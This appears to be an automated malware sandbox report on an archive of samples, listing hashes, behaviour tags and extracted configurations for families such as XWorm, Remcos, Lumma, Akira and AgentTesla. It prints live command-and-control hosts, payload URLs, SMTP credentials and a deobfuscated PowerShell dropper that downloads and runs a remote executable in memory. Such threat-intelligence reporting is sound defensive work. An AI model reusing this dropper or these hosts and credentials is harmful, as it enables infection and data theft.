General

  • Target

    bb80103ac259b0a260fe3fabea6c6ceedf4286f43b24665a9ec30bc1b19bd267

  • Size

    108.7MB

  • Sample

    250328-f2c35stqw8

  • MD5

    541b119f806c80a252c746042bf464ad

  • SHA1

    c9fcbbc03d26a428a412f80e2fe97f25853856cf

  • SHA256

    bb80103ac259b0a260fe3fabea6c6ceedf4286f43b24665a9ec30bc1b19bd267

  • SHA512

    d8bdd55d3021296e9e1688770bc27da0a88d0a36d8f2cac3f469244bd71af6a5a36173fb076376952ad839ecd71d12565bf3e88aa734ce49a3f7bc8195155a5e

  • SSDEEP

    1572864:silUaHZSbqW7IJZ5Q9dWZGoLIP95bARN031ZzlDnFVs9eb8chagiu1Xw+SdBJIpf:sOEzwZ5QlLPfARNAZzlDdosV1Xw+S2f

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_LoEArEgGuZRG2bQs0E

Attributes
  • encryption_key

    yMvSAv7B2dURg67QYU5x

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Extracted

Family

njrat

Version

0.7d

Botnet

RuntimeBroker.exe

C2

hakim32.ddns.net:2000

morning-ultimately.gl.at.ply.gg:14531

Mutex

a7508ccd4c60e6eaa0eb204481c3a0be

Attributes
  • reg_key

    a7508ccd4c60e6eaa0eb204481c3a0be

  • splitter

    |'|'|

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

xworm

C2

language-lose.gl.at.ply.gg:64760

park-meetup.gl.at.ply.gg:62592

z-openings.gl.at.ply.gg:40705

remember-gene.gl.at.ply.gg:9389

Attributes
  • Install_directory

    %Temp%

  • install_file

    checker.exe

Extracted

Language
ps1
Deobfuscated

    # downloads the payload bytes straight into memory (no file written to disk)
    $dguetbwq0k = new-object system.net.webclient
    $wawglcjmem = "http://92.255.85.2/Fox.exe"
    $r9u3at = $dguetbwq0k.downloaddata("http://92.255.85.2/Fox.exe")
    # loads the downloaded bytes as a .NET assembly via reflection
    $vcfrtz = [system.reflection.assembly]::load($r9u3at)
    # locates and invokes the assembly's entry point
    $twvcaa = $vcfrtz.entrypoint
    $twvcaa.invoke($null, @())

URLs
ps1.dropper

http://92.255.85.2/Fox.exe

exe.dropper

http://92.255.85.2/Fox.exe

Extracted

Family

xworm

Version

5.0

C2

year-tim.gl.at.ply.gg:24149

142.147.96.74:7000

buinhatduy01.ddns.net:7000

buinhatduy.duckdns.org:7000

Mutex

2kICHr7gSrOzPXii

Attributes
  • Install_directory

    %Temp%

  • install_file

    jusched.exe

aes.plain

    MCNmdWA32BXEW4Ul73bmwA==

aes.plain

    y6NBaLuaGhr4aOhUzfBwfg==

Extracted

Family

remcos

Botnet

RemoteHost

C2

127.0.0.1:2404

196.251.80.28:2404

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    true

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-4U257D

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

lumma

C2

https://sordid-snaked.cyou/api

https://awake-weaves.cyou/api

https://wrathful-jammy.cyou/api

https://debonairnukk.xyz/api

https://diffuculttan.xyz/api

https://effecterectz.xyz/api

https://deafeninggeh.biz/api

https://immureprech.biz/api

https://bellflamre.click/api

Extracted

Family

agenttesla

Credentials

  • Protocol:
    smtp
  • Host:
    mail.worlorderbillions.top
  • Port:
    587
  • Username:
    agumoney@worlorderbillions.top
  • Password:
    QBD{3zf.F+2F
  • Email To:
    agumoney@worlorderbillions.top

Targets

    • Target

      Files/0018f4feb99c7f12c3f5bfe53998c3c6ca7e2908f666f44a93f914c8c41c588a.exe

    • Size

      988KB

    • MD5

      f88d5cdc31b3c12a7229e96282dfeab2

    • SHA1

      dd00a7281c5398b8db7a7a1f2f5168cb9eed4201

    • SHA256

      0018f4feb99c7f12c3f5bfe53998c3c6ca7e2908f666f44a93f914c8c41c588a

    • SHA512

      7969dcb95cb1f0e5ed15ebee31cc396186f874b80edb3a91b77b89a42f04080627d74db7455a2ba9d9732b1343b9729ee7f34e05282782fbdd6098748f5c19ce

    • SSDEEP

      24576:rkhXHlJvh3QVsBNxJdN5dN+PMjyFOO8n/ebLPNB0AP:rq7phNJld0PMjyIx/ebLb02

    • Guloader family

    • Guloader,Cloudeye

      A shellcode based downloader first seen in 2020.

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

    • Remcos family

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of NtCreateThreadExHideFromDebugger

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Target

      $PLUGINSDIR/System.dll

    • Size

      11KB

    • MD5

      ee260c45e97b62a5e42f17460d406068

    • SHA1

      df35f6300a03c4d3d3bd69752574426296b78695

    • SHA256

      e94a1f7bcd7e0d532b660d0af468eb3321536c3efdca265e61f9ec174b1aef27

    • SHA512

      a98f350d17c9057f33e5847462a87d59cbf2aaeda7f6299b0d49bb455e484ce4660c12d2eb8c4a0d21df523e729222bbd6c820bf25b081bc7478152515b414b3

    • SSDEEP

      192:eF24sihno00Wfl97nH6T2enXwWobpWBTU4VtHT7dmN35Ol9Sl:h8QIl975eXqlWBrz7YLOl9

    Score
    3/10
    • Target

      Files/059cf78adefc07c8225fde4b20f705dfed5c8c90f0d360b84d941c432b99f76b.exe

    • Size

      8.8MB

    • MD5

      6639f9f1bfbd89757f7b6dc824a9d35c

    • SHA1

      a51f99fb2b7b84500f717d2c7628cc882756efd3

    • SHA256

      059cf78adefc07c8225fde4b20f705dfed5c8c90f0d360b84d941c432b99f76b

    • SHA512

      23827b56c284d89c93da5f5570fdb590a47b711f4fb091a0d6585e13e6f1d928d785bfa612dfdcd669cc69ce8d1448abccabea18b5e3fcc3542d8242106cb81f

    • SSDEEP

      196608:Nd5KKE1LoDteQFKVcmQnQnmGOW6La6NLh2UQyI1DS:v5Kz1Lu0tnzF6Laql2U5I1

    Score
    3/10
    • Target

      Files/07610c4fda6b5d6e8920d8da44a58213ef6c4309c794978477e81ed50f885150.exe

    • Size

      1.1MB

    • MD5

      d444a977328b0f1b5e792a794ccd9fd0

    • SHA1

      32a67b71ebb303ee25928a1eb76c548d384589b8

    • SHA256

      07610c4fda6b5d6e8920d8da44a58213ef6c4309c794978477e81ed50f885150

    • SHA512

      d71d6e38ab5a6b0bfead3f288f4202550a46991b02fda710c026248de66fe8b4d5ae7767018671413deee3d3a92a3a5934be1a95ff1e3909fecdb9b7cb0ec9e7

    • SSDEEP

      24576:ru6J33O0c+JY5UZ+XC0kGso6FajYuNaeNAymutbrfYJfIcWY:Fu0c++OCvkGs9FajYulNZvJUfiY

    Score
    5/10
    • Suspicious use of SetThreadContext

    • Target

      Files/0b4a12968bf32f01c3aacc96ab4888e8b04f4ff334f903968afe452fec9bb2e6.exe

    • Size

      1.8MB

    • MD5

      c53d0c64f18101045e5728562404a09b

    • SHA1

      ebec00d5f2675c883038bc149af1da8d7b0cf535

    • SHA256

      0b4a12968bf32f01c3aacc96ab4888e8b04f4ff334f903968afe452fec9bb2e6

    • SHA512

      bdd8080dd0b17514ede52419b755cf324e2a46b2cbb38f504d008e3bf791ef7c6a3cb78cb4f4f51f875e7677dd034750022b41074dc04b1922242fd8f339a2a7

    • SSDEEP

      24576:xbX9r1C3TEukAYhjKVTvC/7f0Of8t2WVP3bw8izhWGsi2:ThEvC/7fhyPrwPzhWGZ

    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Xworm family

    • Boot or Logon Autostart Execution: Active Setup

      Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    • Executes dropped EXE

    • Adds Run key to start application

    • Suspicious use of SetThreadContext

    • Target

      Files/0c10532495658ae6099011796249e76b9ef33235a019df54086bd07547685354.doc

    • Size

      600KB

    • MD5

      62d9f219d4c67d21a6a125597804821b

    • SHA1

      48a46d13ff5571ba085cbd4b9f6575a400199d24

    • SHA256

      0c10532495658ae6099011796249e76b9ef33235a019df54086bd07547685354

    • SHA512

      3296f44e94c842d970de96ccb1c4dc41516f4e7aecd4b5dc22ebfa50238c1f853a169fb90bbfbc8eece44b047987a4bc765f63c263b93deac2eb4162bf274b44

    • SSDEEP

      6144:KwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAE:j

    Score
    8/10
    • Blocklisted process makes network request

    • Target

      Files/0dc6fa2e838c3b03b801833f45d683b0cb27a787aa533e652e449f0456871cd8.exe

    • Size

      956KB

    • MD5

      f0d052d7ce93b6649e0c73e967f32750

    • SHA1

      d83e9314d00948f5e3664b9ad67cd17200a0de9a

    • SHA256

      0dc6fa2e838c3b03b801833f45d683b0cb27a787aa533e652e449f0456871cd8

    • SHA512

      98691ac24e8d8dfaf561adca0a28a4da99a699cd68522870ec3e99888f176a10d39fe93feacdae8ab98ee1448c1e22b28a5ff81cb79f28cf642f0166b2918476

    • SSDEEP

      24576:5u6J33O0c+JY5UZ+XC0kGso6Fafx4pbWJWY:7u0c++OCvkGs9FafxgrY

    Score
    7/10
    • Drops startup file

    • Executes dropped EXE

    • Loads dropped DLL

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • AutoIT Executable

      AutoIT scripts compiled to PE executables.

    • Suspicious use of SetThreadContext

    • Target

      Files/0def0868347c89485ceb5386573bce41ed3a83b343adc3308441f7822988c7d1.exe

    • Size

      567KB

    • MD5

      264c28f35244da45b779e4ead9c6c399

    • SHA1

      f57631c3bec9e05605dfdcf826a63657777d09f3

    • SHA256

      0def0868347c89485ceb5386573bce41ed3a83b343adc3308441f7822988c7d1

    • SHA512

      7d9a11453ea447fb36b20ae289135685468e415a520217f16b4c91cf55fa1afc378c4c3e0e1c0057de3f093dbf53baba5d0bc0e6549534f6e04d5da92d736b40

    • SSDEEP

      12288:XT5jLj8eLkXoW+zlyqPVrJ6TPoqy/j1cLLYCQ51mm4poOcmMp+FoyQZiVo:j5jLjSXoVpysVV6TPzy/jGLm51mm8ym8

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Adds Run key to start application

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      Files/0f6481dabf7871823f259eb95f3b85c37d1de8a7d1884ac77a97d887cf96f75d.exe

    • Size

      393KB

    • MD5

      3c4161be295e9e9d019ce68dae82d60a

    • SHA1

      36447fc6418e209dff1bb8a5e576f4d46e3b3296

    • SHA256

      0f6481dabf7871823f259eb95f3b85c37d1de8a7d1884ac77a97d887cf96f75d

    • SHA512

      cfa2d491a5d28beb8eb908d5af61254ac4c4c88e74c53d5d00ae15ef0731df1654304199996545d1074814c0ea8a032957b28d70774f05347616428e667f70e6

    • SSDEEP

      12288:ndoOphZgRZGJZzu/aeZjl5FeBTCVpgTfR:ndl/QZGTuHhjFe1C3gt

    Score
    10/10
    • Lumma Stealer, LummaC

      Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    • Lumma family

    • Suspicious use of SetThreadContext

    • Target

      Files/0fe572e7aad25a38ba9ee9b4600ddc02641e29061de250c525d6828f70326005.exe

    • Size

      1.0MB

    • MD5

      d37594e06b180d71d1612e6fd61e02a2

    • SHA1

      d9d8836f5ed53513401b379d5806501d5b1e000a

    • SHA256

      0fe572e7aad25a38ba9ee9b4600ddc02641e29061de250c525d6828f70326005

    • SHA512

      a2f4bbe84a0d78897604eaf10c18581c0676f23a15e7ab8b95b80d1f84898a49a4132aecb194631d2df4f0c5616d4d2c85959af27fbbfb65f257773b6ebbde29

    • SSDEEP

      12288:nLXeXuANMx17cMW50NY3RuKI5B/N++PP8fACq6EBvxz:LXcuA4cMW50kuKI5B/pP8fACHE

    • Akira

      Akira is a ransomware first seen in March 2023 and targets several industries, including education, finance, real estate, manufacturing, and consulting.

    • Akira family

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Renames multiple (8643) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Command and Scripting Interpreter: PowerShell

      Run Powershell command to delete shadowcopy.

    • Drops startup file

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Drops desktop.ini file(s)

    • Drops file in System32 directory

    • Target

      Files/115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316.exe

    • Size

      106KB

    • MD5

      af96147082306e597383ea83924d92ec

    • SHA1

      2e092326740df77598ac3cb2898ae6adfb9f100f

    • SHA256

      115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316

    • SHA512

      b141e8eab204af1cff7d460974b04bf51cef24e70b7537f76862f6f633aa1eefb8fdbbb8ec9d7cb6dab0e97244eff560bdcc785bf64a253c40cb3c42c84bc7db

    • SSDEEP

      3072:+fWi4MdM81BorInbhk9H+ZifSKf+nbGOD5zMQUM:+z4MdM8for0iSKgNIQ

    • Detect Xworm Payload

    • StormKitty

      StormKitty is an open source info stealer written in C#.

    • StormKitty payload

    • Stormkitty family

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Xworm family

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Download via BitsAdmin

    • Downloads MZ/PE file

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Drops startup file

    • Executes dropped EXE

    • Adds Run key to start application

    • Legitimate hosting services abused for malware hosting/C2

    • Target

      Files/11c893b8175b916691afb56498a2a35c4fcf038a5f418e3ae7db3c66049abeba.exe

    • Size

      1.1MB

    • MD5

      dcf203f978212ab5254735b47faf5b31

    • SHA1

      1c2bcd70c16274e52f0cfce9c0d2c4853889e8c1

    • SHA256

      11c893b8175b916691afb56498a2a35c4fcf038a5f418e3ae7db3c66049abeba

    • SHA512

      4b9bf7793a86a698c6a8dae36a11b9353ed8eeee4e2b14d6ac95523cc31401e3ecc4f2ba029970a471e84a83072036c8fa8992ff6818bc1b002b87980225e5a0

    • SSDEEP

      24576:Hu6J33O0c+JY5UZ+XC0kGso6Fa4cdgyvtInxcO3I8GvWY:Bu0c++OCvkGs9Fa5dpVsOOYOY

    • Target

      Files/15e3d2f2ae29c63206f13aa1768289a830ac2ef71c83227e3bc61a634ad7b05e.exe

    • Size

      681KB

    • MD5

      c6a8c3eb7aac9d6bc575c07b15fa9184

    • SHA1

      e9017cd563cc0a706cdf37a8671bc2a0c9d2bc9c

    • SHA256

      15e3d2f2ae29c63206f13aa1768289a830ac2ef71c83227e3bc61a634ad7b05e

    • SHA512

      a55d0d3e51e23a32820a9034e6a3f799abafd7217c3b41054c63befc83eeca3d39519d8507d3976b199c1d924687d4c6410ae1055ffd9576fd5b53dee9a394e4

    • SSDEEP

      12288:HGwK7tzJ+Wnqn++Kkchq1uHEEWTIrqZgFfIyJKop37VrOFDDN/mrFUezlndhv43n:dKzMskchVHEEJdKopBwDN

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses Microsoft Outlook profiles

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    • Target

      Files/1ca4a73b1076d2c6c0b97b3544919281b091e260f4970f62ae7f1cbcb9cc5e74.exe

    • Size

      2.5MB

    • MD5

      a6506ab7846f51acccb092a6164c7677

    • SHA1

      12a675e6434764b98335440220864bdffeb6cbfc

    • SHA256

      1ca4a73b1076d2c6c0b97b3544919281b091e260f4970f62ae7f1cbcb9cc5e74

    • SHA512

      44d5c49b54011fed4332ab08375031543108b286a21768b35bd8bfab02cdb413b53cc1bc8e98c554008e9ca9d4ca9a92c03beab01db9a40e87908054b3dd9612

    • SSDEEP

      49152:ZZPjorfOAfRxx13BIq8IYpSqxN7XGQKoBaJ3RIrMQJZipKE1:ZZkzD73i7pSqxNV5wQJwd1

    Score
    10/10
    • Detect Xworm Payload

    • Xworm

      Xworm is a remote access trojan written in C#.

    • Xworm family

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Target

      Files/1dc75c16bf526f435cbdf05c73df57040791b7809d64e158b0b66565e444b3d8.exe

    • Size

      121KB

    • MD5

      cfb23e22eacdf2343fc0f792b49b55c9

    • SHA1

      5bb717295c8bd95f81b840257b39e0957e967e5a

    • SHA256

      1dc75c16bf526f435cbdf05c73df57040791b7809d64e158b0b66565e444b3d8

    • SHA512

      c283d7c9f175f5ca8215ae394bf1938e80feb8e0e50e280ce0903f4fe59560553ac32ca28924f84430d889ef19c44a0db88cc3e74750bfbbd2fbb0209ef2fbf7

    • SSDEEP

      3072:PrYgvm0rkfpICpDsZipXW7SSJz6OFHO8UnXRZrZG:PEgvm0gpGgXuJdJAB

    Score
    5/10
    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Target

      Files/1fb08d6dc54e057419e21ca6c5aa959c2f9833eebd6e8998843a737c009de5c1.exe

    • Size

      97KB

    • MD5

      86faa03faca5764b65096940604a1390

    • SHA1

      f0e183789ae06266195cbe11200e830c011388b4

    • SHA256

      1fb08d6dc54e057419e21ca6c5aa959c2f9833eebd6e8998843a737c009de5c1

    • SHA512

      8366618f8595456ec5a839994b5bf3f0d80345b18f63313a3d191124a2835f3b6ec3a4067503d0ffe14d8e6ad0209c1eb597e6f753c0a82263b3edf9214f56ab

    • SSDEEP

      1536:j7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfVwWq8X4NoOj:/7DhdC6kzWypvaQ0FxyNTBfVnq8y

    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks

static1

upx, telegram, runtimebroker.exe, quasar, njrat, xred, xworm
Score
10/10

behavioral1

guloader, remcos, remotehost, discovery, downloader, persistence, rat
Score
10/10

behavioral2

guloader, remcos, remotehost, discovery, downloader, persistence, rat
Score
10/10

behavioral3

discovery
Score
3/10

behavioral4

discovery
Score
3/10

behavioral5

discovery
Score
3/10

behavioral6

discovery
Score
3/10

behavioral7

discovery
Score
5/10

behavioral8

discovery
Score
5/10

behavioral9

xworm, discovery, persistence, rat, trojan
Score
10/10

behavioral10

xworm, discovery, persistence, rat, trojan
Score
10/10

behavioral11

discovery
Score
8/10

behavioral12

Score
1/10

behavioral13

collection, discovery
Score
7/10

behavioral14

collection, discovery
Score
7/10

behavioral15

discovery, execution
Score
5/10

behavioral16

discovery, execution, persistence, spyware, stealer
Score
7/10

behavioral17

lumma, discovery, stealer
Score
10/10

behavioral18

lumma, discovery, stealer
Score
10/10

behavioral19

akira, execution, ransomware, ransowmware, spyware, stealer
Score
10/10

behavioral20

akira, execution, ransomware, ransowmware, spyware, stealer
Score
10/10

behavioral21

discovery, dropper
Score
8/10

behavioral22

stormkitty, xworm, discovery, dropper, execution, persistence, rat, stealer, trojan
Score
10/10

behavioral23

agenttesla, discovery, keylogger, spyware, stealer, trojan
Score
10/10

behavioral24

agenttesla, discovery, keylogger, spyware, stealer, trojan
Score
10/10

behavioral25

collection, discovery, execution, spyware, stealer
Score
8/10

behavioral26

collection, discovery, execution, spyware, stealer
Score
8/10

behavioral27

xworm, rat, trojan
Score
10/10

behavioral28

xworm, rat, trojan
Score
10/10

behavioral29

upx
Score
5/10

behavioral30

discovery, upx
Score
5/10

behavioral31

discovery
Score
3/10

behavioral32

discovery
Score
3/10